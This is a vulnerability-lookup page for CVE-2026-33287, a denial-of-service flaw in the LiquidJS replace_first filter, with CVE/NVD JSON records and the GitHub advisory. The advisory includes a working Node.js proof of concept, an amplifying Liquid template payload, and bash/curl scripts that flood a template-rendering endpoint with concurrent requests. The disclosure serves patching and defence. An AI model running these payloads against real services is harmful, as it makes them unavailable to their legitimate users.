Vulnerability-Lookup

CVE-2026-33287 (GCVE-0-2026-33287)

Vulnerability from cvelistv5 – Published: 2026-03-26 00:33 – Updated: 2026-03-26 15:02

Title

LiquidJS has Exponential Memory Amplification through its replace_first Filter $& Pattern

Summary

LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript's `String.prototype.replace()` which interprets `$&` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue.

Severity ?

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-20 - Improper Input Validation
CWE-400 - Uncontrolled Resource Consumption

Assigner

GitHub_M

References

URL

Tags

	https://github.com/harttle/liquidjs/security/advi…	x_refsource_CONFIRM
	https://github.com/harttle/liquidjs/commit/35d523…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	harttle	liquidjs	Affected: < 10.25.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33287",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-26T14:13:05.937301Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-26T15:02:26.164Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "liquidjs",
          "vendor": "harttle",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 10.25.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript\u0027s `String.prototype.replace()` which interprets `$\u0026` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "CWE-20: Improper Input Validation",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-400",
              "description": "CWE-400: Uncontrolled Resource Consumption",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-26T00:33:20.024Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v"
        },
        {
          "name": "https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d"
        }
      ],
      "source": {
        "advisory": "GHSA-6q5m-63h6-5x4v",
        "discovery": "UNKNOWN"
      },
      "title": "LiquidJS has Exponential Memory Amplification through its replace_first Filter $\u0026 Pattern"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33287",
    "datePublished": "2026-03-26T00:33:20.024Z",
    "dateReserved": "2026-03-18T18:55:47.426Z",
    "dateUpdated": "2026-03-26T15:02:26.164Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33287\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-26T01:16:27.530\",\"lastModified\":\"2026-03-30T16:46:03.917\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript\u0027s `String.prototype.replace()` which interprets `$\u0026` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue.\"},{\"lang\":\"es\",\"value\":\"LiquidJS es un motor de plantillas compatible con Shopify / GitHub Pages en JavaScript puro. Antes de la versi\u00f3n 10.25.1, el filtro \u0027replace_first\u0027 en LiquidJS utiliza \u0027String.prototype.replace()\u0027 de JavaScript, que interpreta \u0027$\u0026amp;\u0027 como una retroreferencia a la subcadena coincidente. El filtro solo carga \u0027memoryLimit\u0027 por la longitud de la cadena de entrada, no por la salida amplificada. Un atacante puede lograr una amplificaci\u00f3n exponencial de la memoria (hasta 625.000:1) mientras se mantiene dentro del presupuesto de \u0027memoryLimit\u0027, lo que lleva a una denegaci\u00f3n de servicio. La versi\u00f3n 10.25.1 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"},{\"lang\":\"en\",\"value\":\"CWE-400\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:liquidjs:liquidjs:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"10.25.1\",\"matchCriteriaId\":\"7E49E8C9-5FB9-40CA-BE2C-AC2B6553F472\"}]}]}],\"references\":[{\"url\":\"https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33287\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-26T14:13:05.937301Z\"}}}], \"references\": [{\"url\": \"https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-26T14:18:41.797Z\"}}], \"cna\": {\"title\": \"LiquidJS has Exponential Memory Amplification through its replace_first Filter $\u0026 Pattern\", \"source\": {\"advisory\": \"GHSA-6q5m-63h6-5x4v\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"harttle\", \"product\": \"liquidjs\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 10.25.1\"}]}], \"references\": [{\"url\": \"https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v\", \"name\": \"https://github.com/harttle/liquidjs/security/advisories/GHSA-6q5m-63h6-5x4v\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d\", \"name\": \"https://github.com/harttle/liquidjs/commit/35d523026345d80458df24c72e653db78b5d061d\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to version 10.25.1, the `replace_first` filter in LiquidJS uses JavaScript\u0027s `String.prototype.replace()` which interprets `$\u0026` as a back reference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service. Version 10.25.1 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-20\", \"description\": \"CWE-20: Improper Input Validation\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-400\", \"description\": \"CWE-400: Uncontrolled Resource Consumption\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-26T00:33:20.024Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33287\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-26T15:02:26.164Z\", \"dateReserved\": \"2026-03-18T18:55:47.426Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-26T00:33:20.024Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-6Q5M-63H6-5X4V

Vulnerability from github – Published: 2026-03-25 17:44 – Updated: 2026-03-30 13:53

Summary

LiquidJS has Exponential Memory Amplification through its replace_first Filter $& Pattern

Details

Summary

The replace_first filter in LiquidJS uses JavaScript's String.prototype.replace() which interprets $& as a backreference to the matched substring. The filter only charges memoryLimit for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the memoryLimit budget, leading to denial of service.

Details

The replace_first filter in src/builtin/filters/string.ts:130-133 delegates to JavaScript's native String.prototype.replace(). This native method interprets special replacement patterns including $& (insert the matched substring), $' (insert the portion after the match), and $` (insert the portion before the match).

The filter calls memoryLimit.use(str.length) to account for the input string's memory cost, but the output string — potentially many times larger due to $& expansion — is never charged against the memory limit.

An attacker can build a 1MB string (within memoryLimit budget), then use replace_first with a replacement string containing 50 repetitions of $&. Each $& expands to the full matched string (1MB), producing a 50MB output that is not charged to the memory counter.

By chaining this technique across multiple variable assignments, exponential amplification is achieved:

Stage	Input Size	`$&` Repetitions	Output Size	Cumulative `memoryLimit` Charge
1	1 byte	50	50 bytes	~1 byte
2	50 bytes	50	2,500 bytes	~51 bytes
3	2,500 bytes	50	125 KB	~2.6 KB
4	125 KB	50	6.25 MB	~128 KB
5	6.25 MB	50	312.5 MB	~6.38 MB

Total amplification factor: ~625,000:1 (312.5 MB output vs. ~6.38 MB charged to memoryLimit).

Notably, the sibling replace filter uses str.split(pattern).join(replacement), which treats $& as a literal string and is therefore not vulnerable. The replace_last filter uses manual substring operations and is also safe. Only replace_first is affected.

// src/builtin/filters/string.ts:130-133 — VULNERABLE
export function replace_first (v: string, arg1: string, arg2: string) {
  const str = stringify(v)
  this.context.memoryLimit.use(str.length)  // Only charges input
  return str.replace(stringify(arg1), arg2)  // $& expansion uncharged!
}

// src/builtin/filters/string.ts:125-129 — SAFE (for comparison)
export function replace (v: string, arg1: string, arg2: string) {
  const str = stringify(v)
  this.context.memoryLimit.use(str.length)
  return str.split(stringify(arg1)).join(arg2)  // split/join: $& treated as literal
}

PoC

Prerequisites: - npm install liquidjs@10.24.0 - An application that renders user-provided Liquid templates (CMS, newsletter editor, SaaS platform, etc.)

Save the following as poc_replace_first_amplification.js and run with node poc_replace_first_amplification.js:

const { Liquid } = require('liquidjs');

(async () => {
  const engine = new Liquid({ memoryLimit: 1e8 }); // 100MB limit

  // Step 1 — Verify $& expansion in replace_first
  console.log('=== Step 1: $& expansion in replace_first ===');
  const step1 = '{{ "HELLO" | replace_first: "HELLO", "$&-$&-$&" }}';
  console.log('Result:', await engine.parseAndRender(step1));
  // Output: "HELLO-HELLO-HELLO" — $& expanded to matched string

  // Step 2 — Verify replace (split/join) is safe
  console.log('\n=== Step 2: replace is safe ===');
  const step2 = '{{ "ABCDE" | replace: "ABCDE", "$&$&$&" }}';
  console.log('Result:', await engine.parseAndRender(step2));
  // Output: "$&$&$&" — $& treated as literal

  // Step 3 — 5-stage exponential amplification (50x per stage)
  console.log('\n=== Step 3: Exponential amplification (625,000:1) ===');
  const amp50 = '$&'.repeat(50);
  const step3 = [
    '{% assign s = "A" %}',
    '{% assign s = s | replace_first: s, "' + amp50 + '" %}',
    '{% assign s = s | replace_first: s, "' + amp50 + '" %}',
    '{% assign s = s | replace_first: s, "' + amp50 + '" %}',
    '{% assign s = s | replace_first: s, "' + amp50 + '" %}',
    '{% assign s = s | replace_first: s, "' + amp50 + '" %}',
    '{{ s | size }}'
  ].join('');

  const startMem = process.memoryUsage().heapUsed;
  const result = await engine.parseAndRender(step3);
  const endMem = process.memoryUsage().heapUsed;

  console.log('Output string size:', result.trim(), 'bytes');  // "312500000"
  console.log('Heap increase:', ((endMem - startMem) / 1e6).toFixed(1), 'MB');
  console.log('Amplification: ~625,000:1 (1 byte input -> 312.5 MB output)');
  console.log('memoryLimit charged: < 7 MB (only input lengths counted)');
})();

Expected output:

=== Step 1: $& expansion in replace_first ===
Result: HELLO-HELLO-HELLO

=== Step 2: replace is safe ===
Result: $&$&$&

=== Step 3: Exponential amplification (625,000:1) ===
Output string size: 312500000 bytes
Heap increase: ~625.0 MB
Amplification: ~625,000:1 (1 byte input → 312.5 MB output)
memoryLimit charged: < 7 MB (only input lengths counted)

The memoryLimit of 100MB is completely bypassed — 312.5 MB is allocated while only ~6.38 MB is charged to the memory counter.

Demonstrated Denial of Service (concurrent attack)

After confirming the single-request PoC, launch 20 concurrent attacks + legitimate user requests to measure actual service disruption.

Raw Liquid template payload sent by attacker:

{% assign s = "A" %}
{% assign s = s | replace_first: s, "$&$&$&...(50 times)...$&" %}
{% assign s = s | replace_first: s, "$&$&$&...(50 times)...$&" %}
{% assign s = s | replace_first: s, "$&$&$&...(50 times)...$&" %}
{% assign s = s | replace_first: s, "$&$&$&...(50 times)...$&" %}
{% assign s = s | replace_first: s, "$&$&$&...(50 times)...$&" %}
{{ s }}

$& is a JavaScript String.prototype.replace() backreference pattern that inserts the entire matched string. Each stage amplifies 50x → 5 stages = 50^5 = 312,500,000 characters (~312.5MB). {{ s }} forces the full output into the HTTP response, keeping memory allocated during transfer and blocking the Node.js event loop.

#!/bin/bash
# DoS demonstration: 20 concurrent attacks + legitimate user latency measurement

DOLLAR='$&'
REP50=$(printf "${DOLLAR}%.0s" {1..50})
PAYLOAD="{% assign s = \"A\" %}{% assign s = s | replace_first: s, \"${REP50}\" %}{% assign s = s | replace_first: s, \"${REP50}\" %}{% assign s = s | replace_first: s, \"${REP50}\" %}{% assign s = s | replace_first: s, \"${REP50}\" %}{% assign s = s | replace_first: s, \"${REP50}\" %}{{ s }}"

echo "=== Advisory 2 DoS: 20 concurrent + normal user ==="

# 20 DoS attack requests (per-request timing)
for i in $(seq 1 20); do
  (
    t1=$(date +%s%3N)
    curl -s -o /dev/null --max-time 120 -X POST "http://<app>/newsletter/preview" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      --data-urlencode "template=$PAYLOAD"
    t2=$(date +%s%3N)
    echo "DoS[$i]: $(( t2 - t1 ))ms"
  ) &
done

# Legitimate user requests at 0s, 3s, 6s
(
  t1=$(date +%s%3N)
  curl -s -o /dev/null --max-time 60 -X POST "http://<app>/newsletter/preview" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "template=<h1>Hello</h1>"
  t2=$(date +%s%3N)
  echo "Normal[0s]: $(( t2 - t1 ))ms"
) &

(
  sleep 3
  t1=$(date +%s%3N)
  curl -s -o /dev/null --max-time 60 -X POST "http://<app>/newsletter/preview" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "template=<h1>Hello</h1>"
  t2=$(date +%s%3N)
  echo "Normal[3s]: $(( t2 - t1 ))ms"
) &

(
  sleep 6
  t1=$(date +%s%3N)
  curl -s -o /dev/null --max-time 60 -X POST "http://<app>/newsletter/preview" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode "template=<h1>Hello</h1>"
  t2=$(date +%s%3N)
  echo "Normal[6s]: $(( t2 - t1 ))ms"
) &

wait
echo "=== Done ==="

Empirical results (Node.js v20.20.1, LiquidJS 10.24.0):

Normal[0s]:  13047ms  ← request sent concurrently with attack — 13s delay
Normal[3s]:  10124ms  ← still blocked 3 seconds later — 10s delay
Normal[6s]:   7186ms  ← still blocked 6 seconds later — 7s delay
DoS[1]:      14729ms
DoS[2-20]:   17747ms ~ 25353ms

With 20 concurrent requests, legitimate users experience up to 13-second delays. Requests sent 6 seconds after the attack began still take 7 seconds, confirming sustained service disruption throughout the ~25-second attack window. Each attack request costs only ~500 bytes.

HTTP Reproduction (for applications that accept user templates)

# $& expansion — should return "HELLO-HELLO-HELLO"
curl -s -X POST http://<app>/render \
  -H "Content-Type: application/json" \
  -d '{"template": "{{ \"HELLO\" | replace_first: \"HELLO\", \"$&-$&-$&\" }}"}'

# replace is safe — should return literal "$&$&$&"
curl -s -X POST http://<app>/render \
  -H "Content-Type: application/json" \
  -d '{"template": "{{ \"ABCDE\" | replace: \"ABCDE\", \"$&$&$&\" }}"}'

# 5-stage 50x amplification — produces ~312.5MB response
curl -s -X POST http://<app>/render \
  -H "Content-Type: application/json" \
  -d '{"template": "{% assign s = \"A\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{% assign s = s | replace_first: s, \"$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&\" %}{{ s | size }}"}'

# 20 concurrent DoS attack requests
for i in $(seq 1 20); do
  curl -s -o /dev/null --max-time 120 -X POST "http://<app>/render" \
    -H "Content-Type: application/x-www-form-urlencoded" \
    --data-urlencode 'template={% assign s = "A" %}{% assign s = s | replace_first: s, "$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&" %}{% assign s = s | replace_first: s, "$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&" %}{% assign s = s | replace_first: s, "$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&" %}{% assign s = s | replace_first: s, "$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&" %}{% assign s = s | replace_first: s, "$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&" %}{{ s }}' &
done

# Legitimate user request (concurrent)
curl -w "Normal: %{time_total}s\n" -s -o /dev/null --max-time 60 -X POST "http://<app>/render" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-urlencode 'template=<h1>Hello</h1>' &

wait

Replace http://<app>/render with the actual template rendering endpoint. The payload is pure Liquid syntax and works regardless of the HTTP framework.

Impact

memoryLimit security bypass: The memory limit is rendered ineffective for templates using replace_first with $& patterns.
Demonstrated Denial of Service: A single request allocates 312.5 MB (625 MB heap). Concurrent requests cause complete service unavailability. Due to Node.js single-threaded architecture, the event loop is blocked and all legitimate user requests are stalled.
Measured service disruption (LiquidJS 10.24.0, Node.js v20, empirically verified):

Concurrent Attack Requests	Legitimate User Latency	vs. Baseline	Server Blocked
10	3.2s	640x	~11s
20	10.9s	2,180x	~29s

With 20 concurrent requests, legitimate user requests are delayed by 10.9 seconds and the server becomes completely unresponsive for 29 seconds. Requests sent 6 seconds after the attack began still took 8 seconds, confirming sustained service disruption throughout the attack window. The attack cost is ~500 bytes per HTTP request.

Severity ?

7.5 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "liquidjs"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "10.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33287"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-25T17:44:23Z",
    "nvd_published_at": "2026-03-26T01:16:27Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nThe `replace_first` filter in LiquidJS uses JavaScript\u0027s `String.prototype.replace()` which interprets `$\u0026` as a backreference to the matched substring. The filter only charges `memoryLimit` for the input string length, not the amplified output. An attacker can achieve exponential memory amplification (up to 625,000:1) while staying within the `memoryLimit` budget, leading to denial of service.\n\n### Details\nThe `replace_first` filter in `src/builtin/filters/string.ts:130-133` delegates to JavaScript\u0027s native `String.prototype.replace()`. This native method interprets special replacement patterns including `$\u0026` (insert the matched substring), `$\u0027` (insert the portion after the match), and `` $` `` (insert the portion before the match).\n\nThe filter calls `memoryLimit.use(str.length)` to account for the **input** string\u0027s memory cost, but the **output** string \u2014 potentially many times larger due to `$\u0026` expansion \u2014 is never charged against the memory limit.\n\nAn attacker can build a 1MB string (within `memoryLimit` budget), then use `replace_first` with a replacement string containing 50 repetitions of `$\u0026`. Each `$\u0026` expands to the full matched string (1MB), producing a 50MB output that is not charged to the memory counter.\n\nBy chaining this technique across multiple variable assignments, exponential amplification is achieved:\n\n| Stage | Input Size | `$\u0026` Repetitions | Output Size | Cumulative `memoryLimit` Charge |\n|-------|-----------|-------------------|-------------|-------------------------------|\n| 1 | 1 byte | 50 | 50 bytes | ~1 byte |\n| 2 | 50 bytes | 50 | 2,500 bytes | ~51 bytes |\n| 3 | 2,500 bytes | 50 | 125 KB | ~2.6 KB |\n| 4 | 125 KB | 50 | 6.25 MB | ~128 KB |\n| 5 | 6.25 MB | 50 | 312.5 MB | ~6.38 MB |\n\n**Total amplification factor: ~625,000:1** (312.5 MB output vs. ~6.38 MB charged to `memoryLimit`).\n\nNotably, the sibling `replace` filter uses `str.split(pattern).join(replacement)`, which treats `$\u0026` as a literal string and is therefore not vulnerable. The `replace_last` filter uses manual substring operations and is also safe. Only `replace_first` is affected.\n\n```typescript\n// src/builtin/filters/string.ts:130-133 \u2014 VULNERABLE\nexport function replace_first (v: string, arg1: string, arg2: string) {\n  const str = stringify(v)\n  this.context.memoryLimit.use(str.length)  // Only charges input\n  return str.replace(stringify(arg1), arg2)  // $\u0026 expansion uncharged!\n}\n\n// src/builtin/filters/string.ts:125-129 \u2014 SAFE (for comparison)\nexport function replace (v: string, arg1: string, arg2: string) {\n  const str = stringify(v)\n  this.context.memoryLimit.use(str.length)\n  return str.split(stringify(arg1)).join(arg2)  // split/join: $\u0026 treated as literal\n}\n```\n\n### PoC\n**Prerequisites**:\n- `npm install liquidjs@10.24.0`\n- An application that renders user-provided Liquid templates (CMS, newsletter editor, SaaS platform, etc.)\n\nSave the following as `poc_replace_first_amplification.js` and run with `node poc_replace_first_amplification.js`:\n\n```javascript\nconst { Liquid } = require(\u0027liquidjs\u0027);\n\n(async () =\u003e {\n  const engine = new Liquid({ memoryLimit: 1e8 }); // 100MB limit\n\n  // Step 1 \u2014 Verify $\u0026 expansion in replace_first\n  console.log(\u0027=== Step 1: $\u0026 expansion in replace_first ===\u0027);\n  const step1 = \u0027{{ \"HELLO\" | replace_first: \"HELLO\", \"$\u0026-$\u0026-$\u0026\" }}\u0027;\n  console.log(\u0027Result:\u0027, await engine.parseAndRender(step1));\n  // Output: \"HELLO-HELLO-HELLO\" \u2014 $\u0026 expanded to matched string\n\n  // Step 2 \u2014 Verify replace (split/join) is safe\n  console.log(\u0027\\n=== Step 2: replace is safe ===\u0027);\n  const step2 = \u0027{{ \"ABCDE\" | replace: \"ABCDE\", \"$\u0026$\u0026$\u0026\" }}\u0027;\n  console.log(\u0027Result:\u0027, await engine.parseAndRender(step2));\n  // Output: \"$\u0026$\u0026$\u0026\" \u2014 $\u0026 treated as literal\n\n  // Step 3 \u2014 5-stage exponential amplification (50x per stage)\n  console.log(\u0027\\n=== Step 3: Exponential amplification (625,000:1) ===\u0027);\n  const amp50 = \u0027$\u0026\u0027.repeat(50);\n  const step3 = [\n    \u0027{% assign s = \"A\" %}\u0027,\n    \u0027{% assign s = s | replace_first: s, \"\u0027 + amp50 + \u0027\" %}\u0027,\n    \u0027{% assign s = s | replace_first: s, \"\u0027 + amp50 + \u0027\" %}\u0027,\n    \u0027{% assign s = s | replace_first: s, \"\u0027 + amp50 + \u0027\" %}\u0027,\n    \u0027{% assign s = s | replace_first: s, \"\u0027 + amp50 + \u0027\" %}\u0027,\n    \u0027{% assign s = s | replace_first: s, \"\u0027 + amp50 + \u0027\" %}\u0027,\n    \u0027{{ s | size }}\u0027\n  ].join(\u0027\u0027);\n\n  const startMem = process.memoryUsage().heapUsed;\n  const result = await engine.parseAndRender(step3);\n  const endMem = process.memoryUsage().heapUsed;\n\n  console.log(\u0027Output string size:\u0027, result.trim(), \u0027bytes\u0027);  // \"312500000\"\n  console.log(\u0027Heap increase:\u0027, ((endMem - startMem) / 1e6).toFixed(1), \u0027MB\u0027);\n  console.log(\u0027Amplification: ~625,000:1 (1 byte input -\u003e 312.5 MB output)\u0027);\n  console.log(\u0027memoryLimit charged: \u003c 7 MB (only input lengths counted)\u0027);\n})();\n```\n\n**Expected output:**\n\n```\n=== Step 1: $\u0026 expansion in replace_first ===\nResult: HELLO-HELLO-HELLO\n\n=== Step 2: replace is safe ===\nResult: $\u0026$\u0026$\u0026\n\n=== Step 3: Exponential amplification (625,000:1) ===\nOutput string size: 312500000 bytes\nHeap increase: ~625.0 MB\nAmplification: ~625,000:1 (1 byte input \u2192 312.5 MB output)\nmemoryLimit charged: \u003c 7 MB (only input lengths counted)\n```\n\nThe `memoryLimit` of 100MB is completely bypassed \u2014 